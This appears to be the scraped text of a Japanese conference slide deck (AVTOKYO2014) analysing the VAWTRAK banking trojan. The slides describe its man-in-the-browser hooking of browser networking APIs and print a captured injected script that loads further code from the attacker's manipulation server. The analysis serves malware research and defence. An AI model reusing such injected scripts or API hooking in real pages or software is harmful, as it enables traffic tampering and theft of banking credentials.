More Related Content
Similar to AVTOKYO2014 Obsevation of VAWTRAK(ja)
Similar to AVTOKYO2014 Obsevation of VAWTRAK(ja) (6)
AVTOKYO2014 Obsevation of VAWTRAK(ja)
- 6. MITB
(Man In The Browser)
• VAWTRAKは起動しているプロセスにコードを
インジェクションする
• プロセスがブラウザだったら通信に使うDLLの
APIをフックして、通信を書き換える
• IEの場合、wininet.dll
• 対象ブラウザ → IE, Firefox, Chrome
- 13. MITB Injection
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/
loose.dtd">
<HTML lang="ja">
<HEAD><script jve=1>(function(){try{var e="/bmhnno/?c=script&v=3";var t= “D2YWRHBX_BB51F…”;
if(t.length!=10){e+=“&b=“+ encodeURIComponent(t) }var n=document.getElementsByTagName (“head”)[0];
var r=document.createElement(“script"); if(r&&n){r.jve=1;r.src=e;n.appendChild (r)}}catch(i){}})()
</script>
<META http-equiv="Content-Type" content="text/html; charset=SHIFT_JIS">
<META http-equiv="Pragma" content="no-cache">
<script jve=1 src="/bmhnno/?c=script&v=3&b=D2YWR..."></script>
“/bmhnno/…”
→ MITBでマニピュレーションサーバへの通信に書き換え